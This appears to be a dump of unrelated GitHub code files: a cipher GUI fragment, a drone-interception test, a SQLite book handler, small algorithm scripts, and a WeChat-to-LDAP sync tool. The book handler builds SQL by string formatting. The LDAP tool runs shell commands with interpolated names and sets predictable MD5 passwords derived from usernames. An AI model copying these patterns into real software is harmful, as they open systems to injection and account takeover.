self.CipherOptionLabel.grid(column=3, row=1, columnspan=2, padx=10)\n self.CipherOption.grid(column=3, row=2, columnspan=2)\n\n self.KLabel.grid(column=3, row=3, sticky=W, padx=10)\n self.KField.grid(column=3, row=4, columnspan=2, sticky=N, padx=10)\n\n self.DefaultRadioButton.grid(column=3, row=5, sticky=S)\n self.FileRadioButton.grid(column=4, row=5, sticky=S)\n\n self.EncryptButton.grid(column=3, row=6)\n self.DecryptButton.grid(column=4, row=6)\n\n self.main.mainloop()\n\n def EncryptButtonClick(self):\n s = self.TextField.get('1.0', 'end-1c')\n k = self.KField.get()\n if s == \"\":\n if self.var.get() == 0:\n self.ShowDefaultText()\n else:\n self.ShowFileText()\n self.CryptField.configure(state=\"normal\")\n self.CryptField.delete('1.0', 'end-1c')\n self.CryptField.configure(state=\"disabled\")\n else:\n DAO.SetText(s)\n if k == \"\":\n k = self.autokey()\n else:\n crypt = \"\"\n if self.CipherOption.get() == \"Shift Cipher\":\n try:\n k = int(k)\n crypt = ShiftController.Encrypt(k)\n except ValueError:\n messagebox.showinfo(\"Khóa k\", \"Khóa k sai định dạng!\")\n\n elif self.CipherOption.get() == \"Substitution Cipher\":\n if len(k) == 95:\n crypt = SubstitutionController.Encrypt(k)\n else:\n messagebox.showinfo(\"Khóa k\", \"Khóa k chưa đủ lớn!\")\n\n elif self.CipherOption.get() == \"Affine Cipher\":\n k = tuple(int(num) for num in\n k.replace(\", \", \",\").replace(\"(\", \"\").replace(\")\", \"\")\n .replace(\"[\", \"\").replace(\"]\", \"\").replace(\"{\", \"\")\n .replace(\"}\", \"\").replace(\",\", \" \").split(\" \"))\n if len(k) != 2:\n messagebox.showinfo(\"Khóa k\", \"Khóa k sai định dạng!\")\n elif math.gcd(k[0], 128) != 1:\n messagebox.showinfo(\"Khóa k\", \"Khóa k không phù hợp!\")\n else:\n crypt = AffineController.Encrypt(k)\n\n elif self.CipherOption.get() == \"Vigenère Cipher\":\n crypt = VigenereController.Encrypt(k)\n\n elif self.CipherOption.get() == \"Hill Cipher\":\n k = tuple(int(num) for num in\n k.replace(\", \", \",\").replace(\"(\", \"\").replace(\")\", \"\")\n .replace(\"[\", \"\").replace(\"]\", \"\").replace(\"{\", \"\")\n .replace(\"}\", \"\").replace(\",\", \" \").split(\" \"))\n if len(k) != math.isqrt(len(k)) ** 2:\n messagebox.showinfo(\"Khóa k\", \"Khóa k sai định dạng!\")\n elif math.gcd(int(round(np.linalg.det(k)) % 128), 128) != 1:\n messagebox.showinfo(\"Khóa k\", \"Khóa k không phù hợp!\")\n else:\n crypt = HillController.Encrypt(k)\n\n elif self.CipherOption.get() == \"Permutation Cipher\":\n k = tuple(int(num) for num in\n k.replace(\", \", \",\").replace(\"(\", \"\").replace(\")\", \"\")\n .replace(\"[\", \"\").replace(\"]\", \"\").replace(\"{\", \"\")\n .replace(\"}\", \"\").replace(\",\", \" \").split(\" \"))\n if len(k) == len(DAO.GetText()):\n crypt = PermutationController.Encrypt(k)\n else:\n messagebox.showinfo(\"Khóa k\", \"Khóa k sai định dạng!\")\n\n elif self.CipherOption.get() == \"DES\":\n if len(k) == 16:\n crypt = DESController.Encrypt(k)\n else:\n messagebox.showinfo(\"Khóa k\", \"Khóa k chưa đủ lớn!\")\n\n elif self.CipherOption.get() == \"AES 128\":\n if len(k) == 32:\n crypt = AESController.Encrypt(k, 128)\n else:\n messagebox.showinfo(\"Khóa k\", \"Khóa k chưa đủ lớn!\")\n\n elif self.CipherOption.get() == \"AES 192\":\n if len(k) == 48:\n crypt = AESController.Encrypt(k, 192)\n else:\n messagebox.showinfo(\"Khóa k\", \"Khóa k chưa đủ lớn!\")\n\n elif self.CipherOption.get() == \"AES 256\":\n if len(k) == 64:\n crypt = AESController.Encrypt(k, 256)\n else:\n messagebox.showinfo(\"Khóa k\", \"Khóa k chưa đủ lớn!\")\n\n self.CryptField.configure(state=\"normal\")\n crypt = DAO.bin_txt(crypt)\n DAO.SetCrypt(crypt)\n self.CryptField.delete('1.0', 'end-1c')\n self.CryptField.insert(END, crypt.strip())\n self.CryptField.configure(state=\"disabled\")\n\n def DecryptButtonClick(self):\n self.CryptField.configure(state=\"normal\")\n s = self.CryptField.get('1.0', 'end-1c')\n self.CryptField.configure(state=\"disabled\")\n k = self.KField.get()\n if s == \"\":\n self.CryptField.configure(state=\"normal\")\n if self.var.get() == 0:\n self.ShowDefaultCrypt()\n else:\n self.ShowFileCrypt()\n self.CryptField.configure(state=\"disabled\")\n self.TextField.delete('1.0', 'end-1c')\n else:\n if self.var.get() == 1:\n DAO.SetCrypt(s)\n if k == \"\":\n messagebox.showinfo(\"Khóa k\", \"Chưa điền Khóa k!\")\n else:\n text = \"\"\n if self.CipherOption.get() == \"Shift Cipher\":\n try:\n k = int(k)\n text = ShiftController.Decrypt(k)\n except ValueError:\n messagebox.showinfo(\"Khóa k\", \"Khóa k sai định dạng!\")\n\n elif self.CipherOption.get() == \"Substitution Cipher\":\n if len(k) == 95:\n text = SubstitutionController.Decrypt(k)\n else:\n messagebox.showinfo(\"Khóa k\", \"Khóa k chưa đủ lớn!\")\n\n elif self.CipherOption.get() == \"Affine Cipher\":\n k = tuple(int(num) for num in\n k.replace(\", \", \",\").replace(\"(\", \"\").replace(\")\", \"\")\n .replace(\"[\", \"\").replace(\"]\", \"\").replace(\"{\", \"\")\n .replace(\"}\", \"\").replace(\",\", \" \").split(\" \"))\n if len(k) != 2:\n messagebox.showinfo(\"Khóa k\", \"Khóa k sai định dạng!\")\n elif math.gcd(k[0], 128) != 1:\n messagebox.showinfo(\"Khóa k\", \"Khóa k không phù hợp!\")\n else:\n text = AffineController.Decrypt(k)\n\n elif self.CipherOption.get() == \"Vigenère Cipher\":\n text = VigenereController.Decrypt(k)\n\n elif self.CipherOption.get() == \"Hill Cipher\":\n k = tuple(int(num) for num in\n k.replace(\", \", \",\").replace(\"(\", \"\").replace(\")\", \"\")\n .replace(\"[\", \"\").replace(\"]\", \"\").replace(\"{\", \"\")\n .replace(\"}\", \"\").replace(\",\", \" \").split(\" \"))\n if len(k) != math.isqrt(len(k)) ** 2:\n messagebox.showinfo(\"Khóa k\", \"Khóa k sai định dạng!\")\n elif math.gcd(int(round(np.linalg.det(k)) % 128), 128) != 1:\n messagebox.showinfo(\"Khóa k\", \"Khóa k không phù hợp!\")\n else:\n text = HillController.Decrypt(k)\n\n elif self.CipherOption.get() == \"Permutation Cipher\":\n k = tuple(int(num) for num in\n k.replace(\", \", \",\").replace(\"(\", \"\").replace(\")\", \"\")\n .replace(\"[\", \"\").replace(\"]\", \"\").replace(\"{\", \"\")\n .replace(\"}\", \"\").replace(\",\", \" \").split(\" \"))\n if len(k) == len(DAO.GetText()):\n text = PermutationController.Decrypt(k)\n else:\n messagebox.showinfo(\"Khóa k\", \"Khóa k sai định dạng!\")\n\n elif self.CipherOption.get() == \"DES\":\n if len(k) == 16:\n text = DESController.Decrypt(k)\n else:\n messagebox.showinfo(\"Khóa k\", \"Khóa k chưa đủ lớn!\")\n\n elif self.CipherOption.get() == \"AES 128\":\n if len(k) == 32:\n text = AESController.Decrypt(k, 128)\n else:\n messagebox.showinfo(\"Khóa k\", \"Khóa k chưa đủ lớn!\")\n\n elif self.CipherOption.get() == \"AES 192\":\n if len(k) == 48:\n text = AESController.Decrypt(k, 192)\n else:\n messagebox.showinfo(\"Khóa k\", \"Khóa k chưa đủ lớn!\")\n\n elif self.CipherOption.get() == \"AES 256\":\n if len(k) == 64:\n text = AESController.Decrypt(k, 256)\n else:\n messagebox.showinfo(\"Khóa k\", \"Khóa k chưa đủ lớn!\")\n\n text = DAO.bin_txt(text)\n DAO.SetText(text)\n self.TextField.delete('1.0', 'end-1c')\n self.TextField.insert(END, text.strip())\n\n def ShowDefaultText(self):\n self.TextField.insert(END, DAO.GetText().strip())\n\n def ShowFileText(self):\n f = open(filedialog.askopenfilename(), \"r\")\n self.TextField.insert(END, f.read())\n f.close()\n\n def ShowDefaultCrypt(self):\n self.CryptField.configure(state=\"normal\")\n self.CryptField.insert(END, DAO.GetCrypt().strip())\n self.CryptField.configure(state=\"disabled\")\n\n def ShowFileCrypt(self):\n f = open(filedialog.askopenfilename(), \"r\")\n self.CryptField.configure(state=\"normal\")\n self.CryptField.insert(END, f.read())\n self.CryptField.configure(state=\"disabled\")\n f.close()\n\n def autokey(self):\n k = \"\"\n if self.CipherOption.get() == \"Shift Cipher\":\n k = random.randint(0, 127)\n self.KField.insert(END, str(k))\n return k\n\n elif self.CipherOption.get() == \"Substitution Cipher\":\n for i in range(32, 127):\n k += chr(i)\n k = list(k)\n random.shuffle(k)\n k = \"\".join(k)\n self.KField.insert(END, k)\n return k\n\n elif self.CipherOption.get() == \"Affine Cipher\":\n k = 2\n while math.gcd(k, 128) != 1:\n k = random.randint(1, 127)\n k = tuple((k, random.randint(0, 127)))\n self.KField.insert(END, str(k))\n return k\n\n elif self.CipherOption.get() == \"Vigenère Cipher\":\n k = \"\"\n for i in range(random.randint(5, 20)):\n k += chr(random.randint(32, 127))\n self.KField.insert(END, k)\n return k\n\n elif self.CipherOption.get() == \"Hill Cipher\":\n k = np.zeros((2, 2))\n while math.gcd(int(round(np.linalg.det(k)) % 128), 128) != 1:\n temp = []\n while len(temp) < 16:\n temp.append(random.randint(-128, 128))\n k = np.array(temp).reshape((math.isqrt(len(temp)), math.isqrt(len(temp))))\n self.KField.insert(END, str(k.flatten()))\n return k\n\n elif self.CipherOption.get() == \"Permutation Cipher\":\n k = [i for i in range(len(DAO.GetText()))]\n random.shuffle(k)\n self.KField.insert(END, str(k))\n return k\n\n elif self.CipherOption.get() == \"DES\":\n k = []\n for i in range(16):\n k.append(hex(random.randint(0, 15)).replace(\"0x\", \"\"))\n k = \"\".join(k)\n self.KField.insert(END, str(k))\n return k\n\n elif self.CipherOption.get() == \"AES 128\":\n k = []\n for i in range(32):\n k.append(hex(random.randint(0, 15)).replace(\"0x\", \"\"))\n k = \"\".join(k)\n self.KField.insert(END, str(k))\n return k\n\n elif self.CipherOption.get() == \"AES 192\":\n k = []\n for i in range(48):\n k.append(hex(random.randint(0, 15)).replace(\"0x\", \"\"))\n k = \"\".join(k)\n self.KField.insert(END, str(k))\n return k\n\n elif self.CipherOption.get() == \"AES 256\":\n k = []\n for i in range(64):\n k.append(hex(random.randint(0, 15)).replace(\"0x\", \"\"))\n k = \"\".join(k)\n self.KField.insert(END, str(k))\n return k\n","repo_name":"levinhhung20032/Multi-encryptor","sub_path":"View/View.py","file_name":"View.py","file_ext":"py","file_size_in_byte":16382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"33594580552","text":"#! /usr/bin/env python3\n#-*- coding: utf-8 -*-\n'''\n Unit test for interception of a sequence of targets\n'''\nimport numpy as np, scipy.optimize, matplotlib.pyplot as plt\nfrom numpy.random import default_rng\nrng = default_rng()\nfrom itertools import permutations\nfrom copy import copy, deepcopy\nimport pdb\n\nimport proj_manen as pm, proj_manen_utils as pmu\n\ndef _decorate(ax, _l, _t, _yl, _xl=''): ax.legend(_l); ax.set_title(_t); ax.yaxis.set_label_text(_yl); ax.xaxis.set_label_text(_xl); ax.grid()\ndef plot(ax, _d, _targets, plot_targets=True):\n poses = np.asarray(_d.Xs)\n ax.plot(poses[:,0], poses[:,1], 'o', label=f'drone {_d.v:.1f} m/s')\n for _p, _psi, _t in zip(_d.Xs, _d.psis, _d.ts[1:]):\n vx, vy = pm._to_eucl(_d.v, _psi)\n ax.arrow(_p[0], _p[1], vx, vy, width=0.15, head_width=_d.v*0.05, head_length=_d.v*0.1, length_includes_head=True)\n _p1 = _d.get_pos(_t)\n ax.plot((_p[0], _p1[0]), (_p[1], _p1[1]), '--', color='C0')\n\n if plot_targets:\n for _targ in _targets:\n pc0 = _targ.get_pos(0)\n ax.plot(pc0[0], pc0[1], 'o', color='C1', label=f'{_targ.name} ${np.rad2deg(_targ.psi):.1f} deg {_targ.v:.1f} m/s$')\n ax.arrow(pc0[0], pc0[1], _targ.vx, _targ.vy, width=0.2, head_width=_targ.v*0.05, head_length=_targ.v*0.1, length_includes_head=True)\n\n for _ts, _targ in zip(_d.ts[1:], _targets):\n pi = _targ.get_pos(_ts)\n p0 = _targ.get_pos(0)\n ax.plot(pi[0], pi[1], 'o', color='C2', label=f'interception {_targ.name} {_ts:.2f} s')\n ax.plot((p0[0], pi[0]), (p0[1], pi[1]), '--', color='C1')\n \n ax.axis('equal');ax.legend();ax.grid()\n\ndef plot_all_sols(drone, targets, _nc=3):\n perms = set(permutations(targets))\n fig = plt.figure(tight_layout=True, figsize=[12.8, 9.6]); fig.canvas.set_window_title('Interceptions')\n _nc = min(_nc, len(perms))\n _nr, _r = np.divmod(len(perms), _nc)\n if _r>0: _nr+=1 \n axes = fig.subplots(_nr,_nc, sharex=True)#, sharey=True)\n print(f'{len(perms)} permutation')\n for targets, ax in zip(perms, axes.flatten()):\n pm.intercept_sequence(drone, targets)\n plot(ax, drone, targets)\n drone.clear_traj()\n\ndef test_1(filename, rnd=False): # first solution for a given scenario\n drone, targets = pmu.load_scenario(filename)\n if rnd:\n _p = rng.permutation(len(targets))\n targets = np.array(targets)[_p]\n pm.intercept_sequence(drone, targets)\n plot(plt.gca(), drone, targets)\n\ndef test_2(): # plot all solutions for a 2 targets scenario\n drone, targets = pmu.load_scenario('./scenario_2.yaml')\n plot_all_sols(drone, targets)\n plt.savefig('all_sols_scen2.png')\n\ndef test_3(): # plot all solutions for a 3 targets scenario\n drone, targets = pmu.load_scenario('./scenario_3.yaml')\n plot_all_sols(drone, targets)\n plt.savefig('all_sols_scen3.png')\n\ndef test_4(): # plot all solutions for a 4 targets scenario\n drone, targets = pmu.load_scenario('./scenario_4.yaml')\n plot_all_sols(drone, targets, _nc=4)\n plt.savefig('all_sols_scen4.png')\n\ndef test_5(filename): # compute all solutions, keeps worst and best\n #drone, targets = pmu.load_scenario(filename)\n drone, targets = pmu.make_random_scenario(ntarg=8, dp0=(0,0), dv=15)\n perms = set(permutations(targets))\n durations = []\n best_dur, best_targets, best_drone = float('inf'), None, None\n worst_dur, worst_targets, worst_drone = 0., None, None\n for targets in perms:\n _drone = deepcopy(drone)\n dur = pm.intercept_sequence(_drone, targets)\n durations.append(dur)\n if dur < best_dur:\n best_dur, best_targets, best_drone = dur, targets, _drone\n if dur > worst_dur:\n worst_dur, worst_targets, worst_drone = dur, targets, _drone\n #best_id = np.argmin(durations)\n #print(best_id, durations[best_id])\n \n plot(plt.gca(), best_drone, best_targets)\n plt.figure()\n plot(plt.gca(), worst_drone, worst_targets)\n \n #plt.hist(durations)\n plt.show()\n\nimport time\ndef test_6(): # plot exhaustive search time vs number of targets\n ntargs, dts= [2, 3, 4, 5, 6, 7, 8], []\n for ntarg in ntargs:\n drone, targets = pm.make_scenario(ntarg=ntarg, dp0=(0,0), dv=15)\n perms = set(permutations(targets))\n _start = time.perf_counter()\n for targets in perms:\n pm.intercept_sequence(deepcopy(drone), targets)\n _end = time.perf_counter();dts.append(_end-_start)\n print(f'{ntarg} targets -> {dts[-1]:.1f} s')\n plt.plot(ntargs, dts, '--o')\n _decorate(plt.gca(), _l=[''], _t='Search time vs number of targets', _yl='time in s', _xl='number of targets')\n plt.savefig('ex_search_time_vs_size.png')\n \n#test_1('./scenario_1.yaml')\n#test_1('./scenario_6.yaml')\n#plt.savefig('one_sols_scen6.png')\n#test_2()\n#test_3()\n#test_4()\ntest_5('./scenario_6.yaml')\n#test_6()\nplt.show()\n","repo_name":"poine/proj_emen","sub_path":"src/test_2.py","file_name":"test_2.py","file_ext":"py","file_size_in_byte":4916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"29714314664","text":"import sqlite3 as sql\nimport uuid\nfrom . import Book\n\nclass DBHandler(object):\n def __init__(self, conString: str):\n self.con = sql.connect(conString)\n\n def initalize(self):\n self.con.execute(\"\"\"\nCREATE TABLE IF NOT EXISTS \"Books\"\n(\n \"Key\" integer NOT NULL,\n \"Title\" character varying(256) NOT NULL,\n \"Author\" character varying(256) NOT NULL,\n \"Price\" double precision NOT NULL,\n PRIMARY KEY (\"Key\")\n)\"\"\")\n\n def add_book(self, book: Book.Book) -> None:\n self.con.execute(\"\"\"\nINSERT INTO \"Books\"(\n\t\"Title\", \"Author\", \"Price\")\n\tVALUES (\"{0}\", \"{1}\", \"{2}\");\n\"\"\".format(book.title, book.author, book.price))\n self.con.commit()\n\n def del_book(self, key: int) -> int:\n res = self.con.execute(\"\"\"\nDELETE FROM \"Books\" WHERE Key = \"{0}\";\n\"\"\".format(key))\n self.con.commit()\n return res.fetchone()\n\n def edit_book(self, book: Book.Book) -> int:\n res = self.con.execute(\"\"\"\nUPDATE \"Books\" SET \"Title\" = \"{0}\", \"Author\" = \"{1}\", \"Price\" = \"{2}\" WHERE Key = \"{3}\";\n\"\"\".format(book.title, book.author, book.price, book.key))\n self.con.commit()\n return res.fetchone()\n\n def get_books_by_author(self, author: str):\n res = self.con.execute(\"\"\"\nSELECT \"Key\", \"Title\", \"Author\", \"Price\" FROM \"Books\" WHERE \"Author\" = \"{0}\" ORDER BY \"Key\";\n\"\"\".format(author))\n data = res.fetchall()\n return self.__parse_books(data)\n\n def get_books_by_name(self, title: str):\n res = self.con.execute(\"\"\"\nSELECT \"Key\", \"Title\", \"Author\", \"Price\" FROM \"Books\" WHERE \"Title\" = \"{0}\" ORDER BY \"Key\";\n\"\"\".format(title))\n data = res.fetchall()\n return self.__parse_books(data)\n\n def get_all_books(self):\n res = self.con.execute(\"\"\"\nSELECT \"Key\", \"Title\", \"Author\", \"Price\" FROM \"Books\" ORDER BY \"Key\";\n\"\"\")\n data = res.fetchall()\n return self.__parse_books(data)\n\n def get_book(self, id: int) -> Book.Book:\n res = self.con.execute(\"\"\"\nSELECT \"Key\", \"Title\", \"Author\", \"Price\" FROM \"Books\" WHERE \"Key\" = \"{0}\";\n\"\"\".format(id))\n\n data = res.fetchall()\n books = self.__parse_books(data)\n if (len(books) > 0):\n return books[0]\n return None\n\n def __parse_books(self, data):\n books = []\n for key, title, author, price in data:\n book = Book.Book(title, author, price)\n book.key = key\n books.append(book)\n return books\n","repo_name":"Soyvolon/CSCI471","sub_path":"PlayingWithADB/core/DBHandler.py","file_name":"DBHandler.py","file_ext":"py","file_size_in_byte":2447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"13866518530","text":"import numpy as np\n\nn_state = 2\nn_action = 2\nc, r_A, r_B = 3, 2, 1\na = 0.9\nQ_table = np.zeros((n_state, n_action), np.float32)\n\n# initialize transition table\np = np.zeros((n_state, n_action, n_state), np.float32)\np[:, 0, 0] = 1\np[:, 0, 1] = 0\np[:, 1, 0] = 0\np[:, 1, 1] = 1\n\n# initialize cost table\ng = np.zeros((n_state, n_action), np.float32)\ng[0, 0] = -r_A\ng[0, 1] = c - r_B\ng[1, 0] = c - r_A\ng[1, 1] = -r_B\n\n# run value iteration\nfor k in range(1000):\n pre_Q_table = np.copy(Q_table)\n for i in range(n_state):\n for u in range(n_action):\n Q_table[i, u] = g[i, u]\n for j in range(n_state):\n Q_table[i, u] += a * p[i, u, j] * np.min(pre_Q_table[j, :])\n\nprint(Q_table)\n","repo_name":"junmokane/Value_Iteration","sub_path":"value_iteration.py","file_name":"value_iteration.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"37716117780","text":"MOD=10**9+7\nN=int(input())\nt_array=list(map(int, input().split()))\na_array=list(map(int, input().split()))[::-1]\nt_minmax=[]\nbefore_max=0\nfor t in t_array:\n if t>before_max:\n t_minmax.append((t,t))\n before_max=t\n else:\n t_minmax.append((1,before_max))\na_minmax=[]\nbefore_max=0\nfor a in a_array:\n if a>before_max:\n a_minmax.append((a,a))\n before_max=a\n else:\n a_minmax.append((1,before_max))\na_minmax=a_minmax[::-1]\nr=1\nfor i in range(N):\n t_min,t_max=t_minmax[i]\n a_min,a_max=a_minmax[i]\n min_val=max(t_min,a_min)\n max_val=min(t_max,a_max)\n num=max(0,max_val-min_val+1)\n r*=num\n r%=MOD\nprint(r)\n","repo_name":"mfujiwara/atcoder-ruby","sub_path":"AGC-Like/code-festival-2016-qualc/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"12004309614","text":"import os\nimport requests\nimport json\nimport hashlib\nimport datetime\nimport random\nimport pypinyin\n\n\n#企业微信的后台管理和企业微信的secret\nCORPID = \"xxxxxxx\"\nSECRET = \"xxxxxxx\"\n\nTOKEN_URL = 'https://qyapi.weixin.qq.com/cgi-bin/gettoken'\nGROUP_URL = 'https://qyapi.weixin.qq.com/cgi-bin/department/list'\nMEMBER_URL = 'https://qyapi.weixin.qq.com/cgi-bin/user/simplelist'\nLDAP_USER = \"cn=root,dc=example,dc=com\"\nLDAP_PASWD = \"xxxxxxx\"\nDIR_PATH = os.path.split(os.path.realpath(__file__))[0]\n#prod\n#SERVER_HOST = \"ldap://172.17.2.136\"\n#test\nSERVER_HOST = \"ldap://192.168.12.93\"\nGROUP_CONF = \"%s/partment.ldif\"%(DIR_PATH)\nMEMBER_CONF = \"%s/member.ldif\"%(DIR_PATH)\nMODIFY_CONF = \"%s/modify.ldif\"%(DIR_PATH)\nMEMBER_CACHE = \"%s/member.json\"%(DIR_PATH)\nGROUP_CACHE = \"%s/group.json\"%(DIR_PATH)\n\ndef dataGet(url,params):\n \"\"\"获取数据小函数\"\"\"\n res = requests.get(url=url,params=params)\n return res\n\ndef cnToen(word):\n \"\"\"汉字转换为拼音\"\"\"\n str = ''\n for i in pypinyin.pinyin(word, style=pypinyin.NORMAL):\n str += ''.join(i)\n return str\n\ndef uniqrandom():\n nowTime = datetime.datetime.now().strftime(\"%Y%m%d%H%M%S\")\n ranDom = random.randint(0,100000)\n return str(nowTime)+str(ranDom)\n\ndef saveData(filedict):\n \"\"\"保存新拉的数据到本地缓存文件 以便下次拉取进行对比\"\"\"\n for i in filedict:\n json.dump(filedict[i],open(i,'w'))\n\ndef genPasswd(name):\n \"\"\"生成每个成员的密码 md5\"\"\"\n src = \"%sYsx@1ppt\"%(name)\n modify = hashlib.md5()\n modify.update(src.encode(\"utf-8\"))\n return modify.hexdigest()\n\nACCESSTOKEN = dataGet(TOKEN_URL,{'corpid':CORPID,'corpsecret':SECRET}).json()['access_token']\nGROUPLISTGET = dataGet(GROUP_URL,{'access_token':ACCESSTOKEN})\n\ndef wechatDataRet():\n groupDict = {}\n memberDict = {}\n for i in GROUPLISTGET.json()['department']:\n \"\"\"\n 循环取出wechat所有部门名称 以及对应的id 转换为拼音 并添加到group dict中\n 循环通过每个部门的id取出部门里所有人员名称 以及对应的部门id 并添加到member dict中\n \"\"\"\n memberListGet = dataGet(MEMBER_URL,{'access_token':ACCESSTOKEN,'department_id':i['id']})\n groupDict[i['id']] = cnToen(i['name'])\n \"\"\"由于在json规则中userid的为人员名称的拼音 所以直接取userid即可\"\"\"\n for i in memberListGet.json()['userlist']:\n memberDict[(i[\"userid\"]).lower()] = i['department']\n return groupDict,memberDict\n\ndef difNeOl(data,file):\n \"\"\"\n 针对新拉取的数据与旧缓存数据进行比对\n old - new 表示缓存存在 但是wechat不存在 即删除ldap账号\n new - old 表示wechat存在 但是缓存没有 即添加账号\n \"\"\"\n old_Memb = json.load(open(MEMBER_CACHE))\n old_Grou = json.load(open(GROUP_CACHE))\n if file == GROUP_CACHE:\n old = set(old_Grou.values())\n new = set(data.values())\n return list(old - new),list(new - old)\n elif file == MEMBER_CACHE:\n old = set(old_Memb)\n new = set(data)\n return list(old - new), list(new - old)\n else:\n print(\"cache file Error\")\n\ndef initLdap(choose,data,conf):\n \"\"\"执行创建语句\"\"\"\n genraLdif(choose=choose, data=data)\n os.system('ldapadd -x -D %s -w %s -H %s -f %s' % (LDAP_USER, LDAP_PASWD, SERVER_HOST, conf))\n\ndef syncMembInfo(data,choose):\n \"\"\"如果有已离开或者新入职的员工他是在哪个部门 获取部门\"\"\"\n old_Memb = json.load(open(MEMBER_CACHE))\n old_Grou = json.load(open(GROUP_CACHE))\n if data and choose == \"dele\":\n for i in data:\n old_memb = old_Memb[i]\n os.system('ldapdelete -x -D %s -w %s -H %s \\\n \"cn=%s,ou=people,dc=yunshuxie,dc=com\"'%(LDAP_USER,LDAP_PASWD,SERVER_HOST,i))\n confluenceUser(\"delete\",i)\n for z in old_memb:\n groupEdit(\"delete\",i,old_Grou[str(z)])\n print(\"%s -- %s\"%(i,choose))\n elif data and choose == \"add\":\n for i in data:\n initLdap(\"member\", i, MEMBER_CONF)\n confluenceUser(choose,i)\n for z in memberDic[i]:\n groupEdit(choose,i,groupDic[z])\n print(\"%s -- %s\"%(i,choose))\n else:\n print('人员无%s'%(choose))\n\ndef syncGroup(group,choose):\n \"\"\"对部门进行增删同步\"\"\"\n if group and choose == \"dele\":\n for i in group:\n os.system('ldapdelete -x -D %s -w %s -H %s \\\n \"ou=%s,ou=group,dc=yunshuxie,dc=com\"'%(LDAP_USER,LDAP_PASWD,SERVER_HOST,i))\n print(\"%s部门已删除\"%(i))\n elif group and choose == \"add\":\n for i in group:\n initLdap(\"partment\",i,GROUP_CONF)\n print(\"%s部门已添加\"%(i))\n else:\n print('人事架构无%s'%(choose))\n\ndef confluenceUser(choose,name):\n \"\"\"关联所有成员到confluence-user组中\"\"\"\n confluenceUser=\"\"\"\n dn: ou=confluence-users,ou=group,dc=yunshuxie,dc=com\n changetype: modify\n %s: uniqueMember\n uniqueMember: cn=%s,ou=people,dc=yunshuxie,dc=com\n \"\"\"%(choose,name)\n with open(MODIFY_CONF,'w') as f:\n f.write(confluenceUser.replace(\" \",\"\"))\n os.system('ldapadd -x -D %s -w %s -H %s -f %s' % (LDAP_USER, LDAP_PASWD, SERVER_HOST, MODIFY_CONF))\n\ndef groupEdit(choose,name,partment):\n \"\"\"对每个成员进行所在的组关联以及 删除时对成员的组进行同步删除\"\"\"\n modifyLdif=\"\"\"\n dn: ou=%s,ou=group,dc=yunshuxie,dc=com\n changetype: modify\n %s: uniqueMember\n uniqueMember: cn=%s,ou=people,dc=yunshuxie,dc=com\n \"\"\"%(partment,choose,name)\n\n\n with open(MODIFY_CONF, 'w') as f:\n f.write(modifyLdif.replace(\" \", \"\"))\n os.system('ldapadd -x -D %s -w %s -H %s -f %s' % (LDAP_USER, LDAP_PASWD, SERVER_HOST, MODIFY_CONF))\n\ndef genraLdif(choose, data):\n partmentLdif = \"\"\"\n dn: ou=%s,ou=group,dc=yunshuxie,dc=com\n objectClass: groupOfUniqueNames\n cn: %s\n uniqueMember: ou=manager,dc=yunshuxie,dc=com\n \"\"\" % (data, data)\n\n memberLdif = \"\"\"\n dn: cn=%s,ou=people,dc=yunshuxie,dc=com\n objectClass: top\n objectClass: inetOrgPerson\n objectClass: posixAccount\n givenName: %s\n mail: %s@yunshuxie.com\n uid: %s\n displayName: %s\n userPassword: %s\n description: LDAP %s\n gidNumber: 1007\n uidNumber: %s\n homeDirectory: /home/%s\n sn: %s\n cn: %s\n \"\"\" % (data, data, data, data, data, genPasswd(data), data, uniqrandom(), data, data, data)\n if choose == \"partment\":\n with open(GROUP_CONF,'w') as f:\n f.write(partmentLdif.replace(\" \",\"\"))\n elif choose == \"member\":\n with open(MEMBER_CONF,\"w\") as f:\n f.write(memberLdif.replace(\" \",\"\"))\n else:\n print(\"argments Error\")\n exit()\n\n\n\nif os.path.exists(\"%s\"%(MEMBER_CACHE)) and os.path.getsize(\"%s\"%(MEMBER_CACHE)) \\\n and os.path.exists(\"%s\"%(GROUP_CACHE)) and os.path.getsize(\"%s\"%(GROUP_CACHE)):\n \"\"\"\n 判断如果缓存文件都存在并且都不为空则视为人事框架及人员已存在 直接进行增量增删即可\n 如果不符合要求 即视为ldap人事架构及人员为空 需重新初始化 并创建\n \"\"\"\n groupDic, memberDic = wechatDataRet()\n old_G,new_G = difNeOl(groupDic,GROUP_CACHE)\n old_M, new_M = difNeOl(memberDic, MEMBER_CACHE)\n syncGroup(new_G,\"add\")\n syncMembInfo(new_M, \"add\")\n syncMembInfo(old_M,\"dele\")\n syncGroup(old_G, \"dele\")\n saveData({MEMBER_CACHE:memberDic,GROUP_CACHE:groupDic})\n print(\"%s 部门数:%s,人员数:%s\" % (datetime.datetime.now(),len(groupDic), len(memberDic)))\nelse:\n groupDic, memberDic = wechatDataRet()\n for id,departments in groupDic.items():\n initLdap(\"partment\",departments,GROUP_CONF)\n for member,id in memberDic.items():\n initLdap(\"member\",member,MEMBER_CONF)\n confluenceUser(\"add\", member)\n for i in memberDic[member]:\n groupEdit(\"add\",member,groupDic[i])\n print(\"%s 部门数:%s,人员数:%s\" % (datetime.datetime.now(),len(groupDic), len(memberDic)))\n saveData({MEMBER_CACHE:memberDic,GROUP_CACHE:groupDic})","repo_name":"liangyawang121109/work_python","sub_path":"wetoldap.py","file_name":"wetoldap.py","file_ext":"py","file_size_in_byte":8223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"32108242504","text":"# !/usr/bin/env python\n# -*- coding:utf-8 -*-\n# project name: Android_Ui_Automation\n# author: \"Lei Yong\" \n# creation time: 2018/1/10 下午6:35\n# Email: leiyong711@163.com\n\nimport os\nimport re\n\n\ndef getDevices():\n\n # 获取手机信息\n def Info():\n\n # 手机信息正则限制\n def modified(name):\n try:\n reu = list(os.popen(name).readlines())\n return re.findall('.*', reu[0])[0] # ([^\\s\\\\\\]+)\n except:\n 